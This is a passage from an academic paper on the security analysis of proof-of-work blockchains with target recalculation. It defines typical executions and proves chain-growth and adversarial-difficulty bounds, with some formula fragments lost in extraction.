probability space is over all executions of length at most some polynomial in $$\\kappa$$. Formally, the set of elementary outcomes can be defined as a set of strings that encode every variable of every party during each round of a polynomially bounded execution. We won’t delve into such formalism and leave the details unspecified. We will denote by $$\\mathrm{Pr}$$ the probability measure of this space. Define also the random variable $$\\mathcal {E}$$ taking values on this space and with distribution induced by the random coins of all entities (adversary, environment, parties) and the random oracle.\n\nSuppose at round r exactly n parties query the oracle with target T. The probability at least one of them will succeed is\n\\begin{aligned} f(T,n)=1-\\Bigl (1-\\frac{T}{2^\\kappa }\\Bigr )^{qn}. \\end{aligned}\nFor the initial target $$T_0$$ and the initial estimate of the number of parties $$n_0$$, we denote $$f_0 = f(T_0, n_0)$$. Looking ahead, the objective of the target recalculation mechanism would be to maintain a target T for each party such that $$f(T, n_r)\\approx f_0$$ for all rounds r. For this reason, we will drop the subscript from $$f_0$$ and simply refer to it as f; to avoid confusion, whenever we refer to the function $$f(\\cdot ,\\cdot )$$, we will specify its two operands.\n\nNote that f(Tn) is concave and increasing in n and T. In particular, Fact 2 applies. The following proposition provides useful bounds on f(Tn). For convenience, define $$p=q/2^{\\kappa }$$.\n\n### Proposition 1\n\nFor positive integers $$\\kappa ,q,T,n$$ and f(Tn) defined as above,\n$$\\frac{pTn}{1+pTn}\\le f(T,n)\\le {pTn}\\le \\frac{f(T,n)}{1-f(T,n)},\\ \\, \\hbox {where}\\ \\,p=\\frac{q}{2^\\kappa }.$$\n\n### Proof\n\nThe bounds can be obtained using the inequalities $$(1-x)^\\alpha \\ge 1-x\\alpha$$, valid for $$x\\le 1$$ and $$\\alpha \\ge 1$$, and $$e^{-x}\\le \\frac{1}{1+x}$$, valid for $$x\\ge 0$$.    $$\\square$$\n\nAt a round r of an execution E the honest parties might be querying the random oracle for various targets. We denote by $$T_r^{\\min }(E)$$ and $$T_r^{\\max }(E)$$ the minimum and maximum over those targets. We say r is a target-recalculation point of a valid chain $$\\mathcal {C}$$, if there is a block with timestamp r and m exactly divides the number of blocks up to (and including) this block.\n\nWe now define two desirable properties of executions which will be crucial in the analysis. We will show later that most executions have these properties.\n\n### Definition 5\n\nConsider an execution E and constants $$\\eta \\in (0,1]$$ and $$\\theta \\in [1,\\infty )$$. A target-recalculation point r in a chain $$\\mathcal {C}$$ in E is $$(\\eta ,\\theta )$$ -good if the new target T satisfies $$\\eta f\\le f(T,n_r)\\le \\theta f$$. A chain $$\\mathcal {C}$$ in E is $$(\\eta ,\\theta )$$ -good if all its target-recalculation points are $$(\\eta ,\\theta )$$ -good. A round r is $$(\\eta ,\\theta )$$ -good in E if $$\\eta f\\le f(T_r^{\\min }(E),n_r)$$ and $$f(T_r^{\\max }(E),n_r)\\le \\theta f$$. We say that E is $$(\\eta ,\\theta )$$ -good if every round of E was $$(\\eta ,\\theta )$$-good.\n\nFor a round r, the following set of chains is of interest. It contains, besides the chains that the honest parties have, those chains that could potentially belong to an honest party.\nwhere $$\\mathcal {C}\\in E_r$$ means that $$\\mathcal {C}$$ exists and is valid at round r.\n\n### Definition 6\n\nConsider an execution E. For $$\\epsilon \\in [0,\\infty )$$, a block created at round r is $$\\epsilon$$ -accurate if it has a timestamp $$r'$$ such that $$|r'-r|\\le \\epsilon \\frac{ m}{f}$$. We say that $$E_r$$ is $$\\epsilon$$ -accurate if no chain in $$\\mathcal {S}_r$$ contains a block that is not $$\\epsilon$$-accurate. We say that E is $$\\epsilon$$ -accurate if for every round r in the execution, $$E_r$$ is $$\\epsilon$$-accurate.\n\nOur next step is to define the typical set of executions. To this end we define a few more quantities and random variables.\n\nIn an actual execution E the honest parties may be split across different chains with possibly different targets. We are going to study the progress of the honest parties only when their targets lie in a reasonable range. It will turn out that, with high probability, the honest parties always work with reasonable targets. For a round r, a set of consecutive rounds S, and constant $$\\eta \\in (0,1)$$, let\n\\begin{aligned} T^{(r,\\eta )}=\\frac{\\eta f}{pn_r}\\quad \\hbox {and}\\quad T^{(S,\\eta )}=\\min _{r\\in S}T^{(r,\\eta )}. \\end{aligned}\nTo expunge the mystery from the definition of $$T^{(r,\\eta )}$$, note that in an $$(\\eta ,\\theta )$$-good round all honest parties query for target at least $$T^{(r,\\eta )}$$. We now define for each round r a real random variable $$D_r$$ equal to the maximum difficulty among all blocks with targets at least $$T^{(r,\\eta )}$$ computed by honest parties at round r. Define also $$Q_r$$ to equal $$D_r$$ when exactly one block was computed by an honest party and 0 otherwise.\n\nRegarding the adversary, we are going to be interested in periods of time during which he has gathered a number of blocks in the order of m. Given that the targets of blocks are variable themselves, it is appropriate to consider the difficulty acquired by the adversary not in a set of consecutive rounds but rather in a set of consecutive adversarial queries that may span a number of rounds but do are not necessarily a multiple of q.\n\nFor a set of consecutive queries indexed by a set J, we define the following value that will act as a threshold for targets of blocks that are attempted adversary.\n\\begin{aligned} T^{(J)}=\\frac{\\eta (1-\\delta )(1-2\\epsilon )(1-\\theta f)}{32\\tau ^3\\gamma } \\cdot \\frac{m}{|J|}\\cdot 2^\\kappa . \\end{aligned}\nGiven the above threshold, for $$j\\in J$$, if the adversary computed at his j-th query a block of difficulty at most $$1/T^{\\smash {(J)}}$$, then let the random variable $$A^{\\smash {(J)}}_j$$ be equal to the difficulty of this block; otherwise, let $$A^{\\smash {(J)}}_j=0$$. The above definition suggests that we collect in $$A^{\\smash {(J)}}_j$$ the difficulty acquired by the adversary as long as it corresponds to blocks that are not too difficult (i.e., those with targets less than $$T^{(J)}$$). With foresight we note that this will enable a concentration argument for random variable $$A^{\\smash {(J)}}_j$$. We will usually drop the superscript (J) from A.\n\nLet $$\\mathcal {E}_{r-1}$$ contain the information of the execution just before round r. In particular, a value $$E_{r-1}$$ of $$\\mathcal {E}_{r-1}$$ determines the targets against which every party will query the oracle at round r, but it does not determine $$D_r$$ or $$Q_r$$. If E is a fixed execution (i.e., $$\\mathcal {E}=E$$), denote by $$D_r(E)$$ and $$Q_r(E)$$ the value of $$D_r$$ and $$Q_r$$ in E. If a set of consecutive queries J is considered, then, for $$j\\in J$$, $$A^{\\smash {(J)}}_j(E)$$ is defined analogously. In this case we will also write $$\\mathcal {E}^{\\smash {(J)}}_j$$ for the execution just before the j-th query of the adversary.\n\nWith respect to the random variables defined above, the following bound will be useful because it gives an estimate of the progress the honest parties have made in an $$(\\eta ,\\theta )$$-good execution. Note that we are interested in the progress coming from uniquely successful rounds, where exactly one honest party computed a POW. The expected difficulty that will be computed by the $$n_r$$ honest parties at round r is $$pn_r$$. However, the easier the POW computation is, the smaller $$\\mathbf {E}[Q_r|\\mathcal {E}_{r-1}=E_{r-1}]$$ will be with respect to this value. Since the execution is $$(\\eta ,\\theta )$$-good, a POW is computed by the honest parties with probability at most $$\\theta f$$. This justifies the appearance of $$(1-\\theta f)$$ in the bound.\n\n### Proposition 2\n\nIf round r is $$(\\eta ,\\theta )$$-good in E, then  $$\\mathbf {E}[Q_r|\\mathcal {E}_{r-1}=E_{r-1}]\\ge (1-\\theta f){pn_r}$$.\n\n### Proof\n\nLet us drop the subscript r for convenience. Suppose that the honest parties were split into k chains with corresponding targets $$T_1\\le T_2\\le \\cdots \\le T_k=T^{\\max }$$. Let also $$n_1,n_2,\\dots ,n_k$$, with $$n_1+\\cdots +n_k=n$$, be the corresponding number of parties with each chain. First note that\n$$\\prod _{j\\in [k]}\\bigl [1-f(T_j,n_j)\\bigr ] \\ge \\prod _{j\\in [k]}\\bigl [1-f(T^{\\max },n_j)\\bigr ] =1-f(T^{\\max },n)\\ge 1-\\theta f,$$\nwhere the first inequality holds because f(Tn) is increasing in T. Proposition 1 now gives\n$$\\mathbf {E}[Q_r|\\mathcal {E}_{r-1}=E_{r-1}] =\\sum _{i\\in [k]}\\frac{f(T_i,n_i)/T_i}{1-f(T_i,n_i)}\\cdot \\prod _{j\\in [k]}\\bigl [1-f(T_j,n_j)\\bigr ] \\ge (1-\\theta f)\\sum _{i\\in [k]}pn_i.$$\n$$\\square$$\n\nThe properties we have defined will be shown to hold in a $$(\\gamma ,s)$$-respecting environment, for suitable $$\\gamma$$ and s. The following simple fact is a consequence of the definition.\n\n### Fact 1\n\nIn a $$(\\gamma ,s)$$-respecting environment, for any set S of consecutive rounds with $$|S|\\le s$$, any $$S'\\subseteq S$$, and any $$n\\in \\{n_r:r\\in S\\}$$,\n\\begin{aligned} \\frac{1}{\\gamma }\\cdot n\\le \\frac{1}{|S'|}\\cdot \\sum _{r\\in S'}n_r\\le \\gamma \\cdot n. \\end{aligned}\n\n### Proof\n\nThe average of several numbers is bounded by their $$\\min$$ and $$\\max$$. Furthermore, the definition of $$(\\gamma ,s)$$-respecting implies $$\\min _{r\\in S}n_r\\ge \\frac{1}{\\gamma }\\max _{r\\in S}n_r\\ge \\frac{1}{\\gamma }n$$ and $$\\max _{r\\in S}n_r\\le \\gamma \\min _{r\\in S}\\le \\gamma n$$. Thus,\n$$\\frac{1}{\\gamma }\\cdot n\\le \\min _{r\\in S}n_r\\le \\min _{r\\in S'}n_r\\le \\frac{1}{|S'|}\\cdot \\sum _{r\\in S'}n_r \\le \\max _{r\\in S'}n_r\\le \\max _{r\\in S}n_r\\le \\gamma \\cdot n.$$\n$$\\square$$\n\nOur analysis involves a number of parameters that are suitably related. Table 1 summarizes them, recalls their definitions and lists all the constraints that they should satisfy.\n\n### Remark 3\n\nWe remark that for the actual parameterization of the parameters $$\\tau ,m,f$$ of Bitcoin5, i.e., $$\\tau =4,m=2016,f=0.03$$, vis-à-vis the constraints of Table 1, they can be satisfied for $$\\delta = 0.99, \\eta =0.268, \\theta =1.995,\\epsilon = 2.93\\cdot 10^{-8}$$, for $$\\gamma =1.281$$ and $$s = 2.71\\cdot 10^{5}$$. Given that s measures the number of rounds within which a fluctuation of $$\\gamma$$ may take place, we have that the constraints are satisfiable for a fluctuation of up to $$28\\%$$ every approximately 2 months (considering a round to last 18 s).\n\nTable 1.\n\nSystem parameters and requirements on them. The parameters are as follows: positive integers smL; positive reals $$f,\\gamma ,\\delta ,\\epsilon ,\\tau ,\\eta ,\\theta$$, where $$f,\\epsilon ,\\delta \\in (0,1),$$ and $$0<\\eta \\le 1\\le \\theta$$.\n\n $$n_r$$: number of honest parties mining in round r $$t_r$$: number of activated parties that are corrupted $$\\delta$$: advantage of honest parties, $$\\forall r (t_r/n_r<1-\\delta )$$ $$(\\gamma , s)$$: determines how the number of parties fluctuates across rounds, cf. Definition 1 f: probability at least one honest party succeeds in a round assuming $$n_0$$ parties and target $$T_0$$ (the protocol’s initialization parameters) $$\\tau$$: the dampening filter, see Definition 2 $$(\\eta ,\\theta )$$: lower and upper bound determining the goodness of an execution, cf. Definition 5 $$\\epsilon$$: quality of concentration of random variables in typical executions, cf. Definition 8 m: the length of an epoch in number of blocks L: the total run-time of the system [(R0)] $$\\forall r : t_r < (1-\\delta ) n_r$$ [(R1)] $$s\\ge \\frac{\\tau m}{f}+\\frac{m}{8\\tau f}$$ [(R2)] $$\\frac{\\delta }{2}\\ge 2\\epsilon +\\theta f$$ [(R4)] $$17(1+\\epsilon )\\theta \\le 8\\tau (\\gamma -{\\theta f})$$ [(R5)] $$9(1+\\epsilon )\\eta \\gamma ^2\\le 4(1-\\eta \\gamma f)$$ [(R6)] $$7\\theta (1-\\epsilon )(1-\\theta f)\\ge 8\\gamma ^2$$\n\n### 6.2 Chain-Growth Lemma\n\nWe now prove the Chain-growth lemma. This lemma appears already in , but it refers to number of blocks instead of difficulty. In the name “chain growth” appears for the first time and the authors explicitly state a chain-growth property.\n\nInformally, this lemma says that honest parties will make as much progress as how many POWs they obtain. Although simple to prove, the chain-growth lemma is very important, because it shows that no matter what the adversary does the honest parties will advance (in terms of accumulated difficulty) by at least the difficulty of the POWs they have acquired.\n\n### Lemma 1\n\nLet E be any execution. Suppose that at round u an honest party has a chain of difficulty d. Then, by round $$v+1\\ge u$$, every honest party will have received a chain of difficulty at least $$\\,d+\\sum _{r=u}^vD_r(E)$$.\n\n### Proof\n\nBy induction on $$v-u$$. For the basis, $$v+1=u$$ and $$\\,d+\\sum _{r=u}^vD_r(E)=d$$. Observe that if at round u an honest party has a chain $$\\mathcal {C}$$ of difficulty d, then that party broadcast $$\\mathcal {C}$$ at a round earlier than u. It follows that every honest party will receive $$\\mathcal {C}$$ by round u.\n\nFor the inductive step, note that by the inductive hypothesis every honest party has received a chain of difficulty at least $$d'=d+\\sum _{r=u}^{v-1}D_r$$ by round v. When $$D_v=0$$ the statement follows directly, so assume $$D_v>0$$. Since every honest party queried the oracle with a chain of difficulty at least $$d'$$ at round v, if follows that an honest party successful at round v broadcast a chain of difficulty at least $$d'+D_v=d+\\sum _{r=u}^vD_r$$.    $$\\square$$\n\n### 6.3 Typical Executions: Definition and Related Proofs\n\nWe can now define formally our notion of typical executions. Intuitively, the idea that this definition captures is as follows. Suppose that we examine a certain execution E. Note that at each round of E the parties perform Bernoulli trials with success probabilities possibly affected by the adversary. Given the execution, these trials are determined and we may calculate the expected progress the parties make given the corresponding probabilities. We then compare this value to the actual progress and if the difference is reasonable we declare E typical. Note, however, that considering this difference by itself will not always suffice, because the variance of the process might be too high. Our definition, in view of Theorem 6, says that either the variance is high with respect to the set of rounds we are considering, or the parties have made progress during these rounds as expected.\n\nBeyond the behavior of random variables described above, a typical execution will also be characterized by the absence of a number of bad events about the underlying hash function $$H(\\cdot )$$ which is used in proofs of work and is modeled as a random oracle. The bad events that are of concern to us are defined as follows; (recall that a block’s creation time is the round that it has been successfully produced by a query to the random oracle either by the adversary or an honest party).\n\n### Definition 7\n\nAn insertion occurs when, given a chain $$\\mathcal {C}$$ with two consecutive blocks B and $$B'$$, a block $$B^*$$ created after $$B'$$ is such that $$B,B^*,B'$$ form three consecutive blocks of a valid chain. A copy occurs if the same block exists in two different positions. A prediction occurs when a block extends one with later creation time.\n\nGiven the above we are now ready to specify what is a typical execution.\n\n### Definition 8\n\n(Typical execution). An execution E is $$(\\epsilon ,\\eta ,\\theta )$$-typical if the following hold:\n1. (a)\nIf, for any set S of consecutive rounds, $$pT^{(S,\\eta )}\\sum _{r\\in S}n_r\\ge \\frac{\\eta m}{16\\tau \\gamma }$$, then\n\\begin{aligned}\\begin{gathered} \\sum _{r\\in S}Q_r(E)\\ge \\sum _{r\\in S}\\mathbf {E}[Q_r|\\mathcal {E}_{r-1}=E_{r-1}] -\\epsilon (1-\\theta f)p\\sum _{r\\in S}n_r \\\\ \\text { and } \\sum _{r\\in S}D_r(E)\\le (1+\\epsilon )p\\sum _{r\\in S}n_r. \\end{gathered}\\end{aligned}\n\n2. (b)\nFor any set J indexing a set of consecutive queries of the adversary we have\n\\begin{aligned} \\sum _{j\\in J}A_j(E)\\le (1+\\epsilon )2^{-\\kappa }|J| \\end{aligned}\nand during these queries the blocks with targets (strictly) less than $$\\tau T^{\\smash {(J)}}$$ that the adversary has acquired are (strictly) less than $$\\frac{\\eta (1-\\epsilon )(1-\\theta f)}{32\\tau ^2\\gamma }\\cdot m$$.\n\n3. (c)\n\nNo insertions, no copies, and no predictions occurred in E.\n\n### Remark 4\n\nNote that if J indexes the queries of the adversary in a set S of consecutive rounds, then $$|J|=q\\sum _{r\\in S}t_r$$ and the inequality in Definition 8(b) reads $$\\sum _{j\\in J}A_j(E)\\le (1+\\epsilon )p\\sum _{r\\in S}t_r$$.\n\nThe next proposition simplify our applications of Definition 8(a).\n\n### Proposition 3\n\nAssume E is a typical execution in a $$(\\gamma ,s)$$-respecting environment. For any set S of consecutive rounds with $$|S|\\ge \\frac{m}{16\\tau f}$$,\n$$\\sum _{r\\in S}D_r\\le (1+\\epsilon )p\\sum _{r\\in S}n_r .$$\nIf in addition, E is $$(\\eta ,\\theta )$$-good, then\n$$\\sum _{r\\in S}Q_r\\ge (1-\\epsilon )(1-\\theta f)p\\sum _{r\\in S}n_r$$\nand any block computed by an honest party at any round r corresponds to target at least $$T^{(r,\\eta )}$$, and so contributes to the random variables $$D_r$$ and $$Q_r$$ (if the r was uniquely successful).\n\n### Proof\n\nWe first partition S into several parts with size at least $$\\frac{m}{16\\tau f}$$ and at most s. In view of Proposition 2, for both of the inequalities, we only need to verify the ‘if’ part of Definition 8(a) for each part $$S'$$ of S. Indeed, by the definition of $$T^{(S',\\eta )}$$ and Fact 1, $$pT^{(S',\\eta )}\\sum _{r\\in S'}n_r\\ge \\eta f|S'|/\\gamma \\ge \\frac{\\eta m}{16\\tau \\gamma }$$. The last part, in view of the definition of $$T^{(r,\\eta )}$$, is equivalent to r being $$(\\eta ,\\theta )$$-good.    $$\\square$$\n\nAlmost all polynomially bounded executions (in $$\\kappa$$) are typical:\n\n### Proposition 4\n\nAssuming the ITM system $$(\\mathcal {Z},C)$$ runs for L steps, the event “$$\\mathcal {E}\\hbox { is not typical}$$” is bounded by $$\\exp (- \\varOmega (\\min \\{m,\\kappa \\}) + \\ln L)$$. Specifically, the bound is $$\\exp \\bigl \\{-\\frac{\\eta \\epsilon ^2(1-2\\delta )m}{64\\tau ^3\\gamma }+2(\\ln L +\\ln 2)\\bigr \\}+2^{-\\kappa +1+2\\log L}$$.\n\n### Proof\n\nSee the full version.    $$\\square$$\n\n### Lemma 2\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. If $$E_{r}$$ is $$(\\eta ,\\theta )$$-good, then $$\\mathcal {S}_{r+1}$$ contains no chain that has not been extended by an honest party for at least $$\\frac{m}{16\\tau f}$$ consecutive rounds.\n\n### Proof\n\nSuppose—towards a contradiction—$$\\mathcal {C}\\in \\mathcal {S}_{r+1}$$ and has not been extended by an honest party for at least $$\\frac{m}{16\\tau f}$$ rounds. Without loss of generality we may assume that $$r+1$$ is the first such round.\n\nLet $$r^*\\le r$$ denote the greatest timestamp among the blocks of $$\\mathcal {C}$$ computed by honest parties ($$r^*=0$$ if none exists). Define $$S=\\{r^*+1,\\dots ,r\\}$$ with $$|S|\\ge \\frac{m}{16\\tau f}$$ and the index-set of the corresponding set of queries $$J=\\{1,\\dots ,q\\sum _{r\\in S}t_r\\}$$. Suppose that the blocks of $$\\mathcal {C}$$ with timestamps in S span k epochs with corresponding targets $$T_1,\\dots ,T_k$$. For $$i\\in [k]$$ let $$m_i$$ be the number of blocks with target $$T_i$$ and set $$M=m_1+\\cdots +m_k$$.\n\nOur plan is to contradict the assumption that $$\\mathcal {C}\\in \\mathcal {S}_{r+1}$$, by showing that the honest parties have accumulated more difficulty than the adversary. To be precise, note that the blocks $$\\mathcal {C}$$ has gained in S sum to $$\\sum _{i\\in [k]}\\frac{m_i}{T_i}$$ difficulty. On the other hand, by the Chain-Growth Lemma 1, all the honest parties have advanced during the rounds in S by $$\\sum _{r\\in S}D_r(E)\\ge \\sum _{r\\in S}Q_r(E)$$. Since $$|S|\\ge \\frac{m}{16\\tau f}$$, Proposition 3 implies that $$\\sum _{r\\in S}Q_r(E)$$ is at least $$(1-\\epsilon )(1-\\theta f)p\\sum _{r\\in S}n_r$$. Therefore, to obtain a contradiction, it suffices to show that\n\\begin{aligned} \\sum _{i\\in [k]}\\frac{m_i}{T_i}<(1-\\epsilon )(1-\\theta f)p\\sum _{r\\in S}n_r. \\end{aligned}\n(1)\nWe proceed by considering cases on M.\nFirst, suppose $$M\\ge 2M'$$, where $$M'=\\frac{\\eta (1-\\epsilon )(1-\\theta f)}{32\\tau ^2\\gamma }\\cdot m$$ (see Definition 8(b)). Partition the part of $$\\mathcal {C}$$ with these M blocks into $$\\ell$$ parts, so that each part has the following properties: (1) it contains at most one target-calculation point, and (2) it contains at least $$M'$$ blocks with the same target. Note that such a partition exists because $$M\\ge 2M'$$ and $$M'<m$$. For $$i\\in [\\ell ]$$, let $$j_i\\in J$$ be the index of the query during which the last block of the i-th part was computed. Set $$J_i=\\{j_{i-1}+1,\\dots ,j_i\\}$$, with $$j_0=0$$. Note that Definition 8(c) implies $$j_{i-1}<j_i$$, and this is a partition of J. Recalling Definition 8(b), the sum of the difficulties of all the blocks in the i-th part is at most $$\\sum _{j\\in J_i}A_j(E)$$. This holds because one of the targets is at least $$\\tau T^{(J_i)}$$ (since more than $$M'$$ blocks have been computed in $$J_i$$ with this target) and so both are at least $$\\smash {T^{(J_i)}}$$ (since targets with at most one calculation point between them can differ by a factor at most $$\\tau$$). Thus,\n$$\\sum _{i\\in [k]}\\frac{m_i}{T_i} \\le \\sum _{i\\in [\\ell ]\\atop j\\in J_i}A_j(E) \\le \\sum _{i\\in [\\ell ]}\\frac{1+\\epsilon }{2^\\kappa }|J_i| =(1+\\epsilon )p\\sum _{r\\in S}t_r <(1+\\epsilon )(1-\\delta )p\\sum _{r\\in S}n_r ,$$\nwhere in the last step we used Requirement (R0). Requirement (R1) implies $$(1+\\epsilon )(1-\\delta )\\le (1-\\epsilon )(1-\\theta f)$$); thus, Eq. (1) holds concluding the case $$M\\ge 2M'$$.\nOtherwise, $$k\\le 2$$ and $$m_1+m_2<2M'$$. Let $$S'$$ consist of the first $$\\frac{m}{16\\tau f}$$ rounds of S. We are going to argue that in this case Eq. (1) holds even for $$S'$$ in the place of S. Since we are in a $$(\\gamma ,s)$$-respecting environment, by Fact 1, $$\\gamma \\sum _{r\\in S'}n_r\\ge n_{r^*}|S'|$$. Furthermore, since $$r^*$$ is $$(\\eta ,\\theta )$$-good, $$T_1\\ge T^{(r^*,\\eta )}=\\eta f/pn_{r^*}$$. Recalling also that $$T_2\\ge T_1/\\tau$$, we have $$\\frac{m_1}{T_1}+\\frac{m_2}{T_2}\\le \\frac{m_1+\\tau m_2}{T_1}$$, which in turn is at most\n$$\\frac{\\tau M}{T^{(r^*,\\eta )}} <\\frac{2\\tau M'pn_{r^*}}{\\eta f} \\le \\frac{2\\tau \\gamma M'p\\sum _{r\\in S'}n_r}{\\eta f|S'|} \\le \\frac{32\\tau ^2\\gamma M'p\\sum _{r\\in S}n_r}{\\eta m}$$\nand, after substituting $$M'$$, Eq. (1) holds concluding this case and the proof.    $$\\square$$\n\n### Corollary 1\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. If $$E_{r-1}$$ is $$(\\eta ,\\theta )$$-good, then $$E_{r}$$ is $$\\frac{m}{16\\tau f}$$-accurate.\n\n### Proof\n\nSuppose—towards a contradiction—that, for some $$r^*\\le r$$, $$\\mathcal {C}\\in \\mathcal {S}_{r^*}$$ contains a block which is not $$\\frac{m}{16\\tau f}$$-accurate and let $$u\\le r^*\\le r$$ be the timestamp of this block and v its creation time. If $$u-v>\\frac{m}{16\\tau f}$$, then every honest party would consider $$\\mathcal {C}$$ to be invalid during rounds $$v,v+1,\\dots ,u$$. If $$v-u>\\frac{m}{16\\tau f}$$, then in order for $$\\mathcal {C}$$ to be valid it should not contain any honest block with timestamp in $$u,u+1,\\dots ,v$$. (Note that we are using Definition 8(c) here as a block could be inserted later.) In either case, $$\\mathcal {C}\\in \\mathcal {S}_{r^*}$$, but has not been extended by an honest party for at least $$\\frac{m}{16\\tau f}$$ rounds. Since $$E_{r^*-1}$$ is $$(\\eta ,\\theta )$$-good, the statement follows from Lemma 2.    $$\\square$$\n\n### Lemma 3\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment and $$r^*$$ an $$(\\eta \\gamma ,\\frac{\\theta }{\\gamma })$$-good target-recalculation point of a valid chain $$\\mathcal {C}$$. For $$r>r^*+\\frac{\\tau m}{f}$$, assume $$E_{r-1}$$ is $$(\\eta ,\\theta )$$-good. Then, either the duration $$\\varDelta$$ of the epoch of $$\\mathcal {C}$$ starting at $$r^*$$ satisfies\n\\begin{aligned} \\frac{m}{\\tau f}\\le \\varDelta \\le \\frac{\\tau m}{f}, \\end{aligned}\nor $$\\mathcal {C}\\notin \\mathcal {S}_u$$ for each $$u\\in \\{r^*+\\frac{\\tau m}{f},\\ldots ,r\\}$$.\n\n### Proof\n\nLet T be the target of the epoch in question.\n\nFor the upper bound, assume $$\\varDelta >\\frac{\\tau m}{f}$$. We show first that in the rounds $$S=\\{r^*+\\frac{m}{16\\tau f},\\dots ,r^*+\\frac{\\tau m}{f}-\\frac{m}{16\\tau f}\\}$$ the honest parties have acquired more than $$\\frac{m}{T}$$ difficulty. Note that the rounds of S are $$(\\eta ,\\theta )$$-good as they come before r. Thus, by Proposition 3, the difficulty acquired in S by the honest parties is at least\n$$(1-\\epsilon )(1-\\theta f)p\\sum _{r\\in S}n_r \\ge (1-\\epsilon )(1-\\theta f)p\\cdot \\frac{|S|n_{r^*}}{\\gamma }\\ge (1-\\epsilon )(1-\\theta f)|S|\\frac{\\eta f}{T} >\\frac{m}{T}.$$\nFor the first inequality, we used Fact 1. For the second, recall that $$r^*$$ is -good and so $$pTn_{r^*}\\ge f(T,n_{r^*})\\ge \\eta \\gamma f$$. For the last inequality observe that and thus follows from Requirement (R3).\n\nNext, we observe that chain $$\\mathcal {C}$$ either has a block within the epoch in question that is computed by an honest party in a round within the period $$[r^*,r^*+\\frac{m}{16\\tau f})$$, or by Lemma 2, $$\\mathcal {C}\\notin \\mathcal {S}_u$$ for each $$u\\in \\{r^*+\\frac{m}{16\\tau f},\\ldots ,r\\}\\supseteq \\{r^*+\\frac{\\tau m}{f},\\ldots ,r\\}$$. Assuming the first happens, it follows that by round $$r^*+\\frac{\\tau m}{f}-\\frac{m}{16\\tau f}$$ the honest parties’ chains have advanced by an amount of difficulty which exceeds the total difficulty of the epoch in question. This means that no honest party will extend $$\\mathcal {C}$$ during the rounds $$\\{r^*+\\frac{\\tau m}{f}-\\frac{m}{16\\tau f}+1,\\dots ,\\varDelta \\}$$. Since it is assumed $$\\varDelta >r^*+\\frac{\\tau m}{f}$$, Lemma 2 can then be applied to imply that $$\\mathcal {C}\\notin \\mathcal {S}_u$$ for $$u\\in \\{r^*+\\frac{\\tau m}{f},\\dots ,r\\}$$.\n\nFor the lower bound, we assume $$\\varDelta <\\frac{m}{\\tau f}$$ and that $$\\mathcal {C}\\in \\mathcal {S}_u$$ for some $$u\\in \\{r^*+\\varDelta +1,\\dots ,r\\}$$, and seek a contradiction. Clearly, the honest parties contributed only during the set of rounds $$S=\\{r^*,\\dots ,r^*+\\varDelta \\}$$. The adversary, by Lemma 2, may have contributed only during $$S'=\\{r^*-\\frac{m}{16\\tau f},\\dots ,r^*+\\varDelta +\\frac{m}{16\\tau f}\\}$$. Let J be the set of queries available to the adversary during the rounds in $$S'$$. We show that in a typical execution the honest parties together with the adversary cannot acquire difficulty $$\\frac{m}{T}$$ in the rounds in the sets S and $$S'$$ respectively. With respect to the honest parties, Proposition 3 applies. Regarding the adversary, assume first $$T\\ge T^{(J)}$$ (it is not hard to verify that the case $$T<T^{(J)}$$ leads to a more favorable bound). It follows that the total difficulty contributed to the epoch is at most\n$$(1+\\epsilon )p\\biggl (\\sum _{r\\in S}n_r+\\sum _{r\\in S'}t_r\\biggr ) \\le (1+\\epsilon )p\\gamma n_{r^*}(|S|+|S'|) <(1+\\epsilon )p\\gamma n_{r^*}\\cdot \\frac{17m}{8\\tau f} .$$\nThe first inequality follows from Fact 1 using $$t_r<(1-\\delta )n_r$$. For the second substitute the upper bounds on the sizes of S and $$S'$$. Next, note that $$r^*$$ is an -good recalculation point and so . By Proposition 1, . It follows that the last displayed quantity is at most $$\\frac{17(1+\\epsilon )\\theta }{8\\tau (\\gamma -{\\theta f})}\\cdot \\frac{m}{T}$$ and recalling Requirement (R4) this less than $$\\frac{m}{T}$$ as desired.    $$\\square$$\n\n### Proposition 5\n\nAssume E is a typical execution in a $$(\\gamma ,s)$$-respecting environment. Consider a round r and a set of consecutive rounds S with $$|S|\\ge \\frac{m}{32\\tau ^2f}$$. If $$E_{r-1}$$ is $$(\\eta ,\\theta )$$-good, then the adversary, during the rounds in S, has contributed at most $$(1-\\delta )(1+\\epsilon )p\\sum _{r\\in S}n_r$$ difficulty to $$\\mathcal {S}_r$$.\n\n### Proof\n\nWithout loss of generality, we will assume in this proof that $$t_r=(1-\\delta )n_r$$ for each $$r\\in S$$. Furthermore, we assume $$|S|\\le \\frac{\\tau m}{f}$$. If this is not the case, then we can partition S to parts of appropriate sizes and apply the arguments that follow to each sum. The statement will follow upon summing over all parts.\n\nBy Lemma 2, for any block B in $$\\mathcal {S}_r$$, there is a block in the same chain and computed at most $$\\frac{m}{16\\tau f}$$ rounds earlier than it. By Lemma 3, there is at most one recalculation point between them. Let u be the round the honest party computed this block and T its target. Note that since E is $$(\\eta ,\\theta )$$-good, $$T\\ge T^{(u,\\eta )}=\\frac{\\eta f}{pn_u}$$ and the target of B is at least $$\\tau ^{(-1)}T$$. We are going to show that, with J the set of queries that correspond to S, we have $$\\tau ^{-1}T\\ge T^{\\smash {(J)}}$$. This will suffice, because $$(1-\\delta )(1+\\epsilon )p\\sum _{r\\in S}n_r\\ge (1+\\epsilon )p\\sum _{r\\in S}t_r$$, and this is at least $$\\sum _{j\\in J}A_j$$ in a typical execution (Definition 8(b)).\n\nNote first that, using Fact 1 and the lower-bound on |S|,\n$$2^{-\\kappa }|J| =(1-\\delta )p\\sum _{r\\in S}n_r \\ge (1-\\delta )p\\frac{|S|n_u}{\\gamma }\\ge (1-\\delta )p\\frac{mn_u}{32\\tau ^3f\\gamma } .$$\nRecalling the definition of $$T^{(J)}$$ and using this bound,\n$$T^{(J)}=\\frac{\\eta (1-\\delta )(1-2\\epsilon )(1-\\theta f)}{32\\tau ^3\\gamma }\\cdot \\frac{m}{|J|}\\cdot 2^\\kappa \\le \\frac{\\eta f(1-2\\epsilon )(1-\\theta f)}{\\tau pn_u} <\\frac{T^{(u,\\eta )}}{\\tau }\\le \\frac{T}{\\tau },$$\nas desired.    $$\\square$$\n\n### Lemma 4\n\nLet E be a typical execution in a $$(\\gamma ,s)$$-respecting environment and assume $$E_{r-1}$$ is $$(\\eta ,\\theta )$$-good. If $$\\mathcal {C}\\in \\mathcal {S}_r$$, then $$\\mathcal 